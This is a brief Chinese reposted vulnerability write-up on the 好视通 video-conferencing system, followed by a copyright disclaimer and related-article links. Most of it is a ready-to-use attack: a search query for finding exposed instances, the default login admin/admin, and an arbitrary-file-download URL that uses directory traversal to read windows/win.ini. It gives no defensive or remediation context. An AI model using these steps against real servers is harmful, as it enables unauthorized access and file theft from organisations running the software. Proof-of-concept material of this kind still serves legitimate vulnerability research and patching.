好视通-视频会议存在弱口令&任意文件下载漏洞

本文转载自查看原文 2021-04-18 12:11 218 漏洞复现/ 时间 2021

系统存在弱口令和任意文件下载漏洞

app="好视通-视频会议"

POC

admin/admin

登录界面

登录成功

POC

/register/toDownload.do?fileName=敏感文件路径
（https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini）

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 任意文件下载漏洞学习任意文件下载漏洞 Java 任意文件下载漏洞任意文件下载漏洞关于任意文件下载及上传漏洞任意文件下载漏洞学习浅谈任意文件下载漏洞的利用 (原创)浅谈任意文件下载漏洞的利用 dzzoffice 任意文件下载漏洞分析若依4.5.0-4.5.1任意文件下载漏洞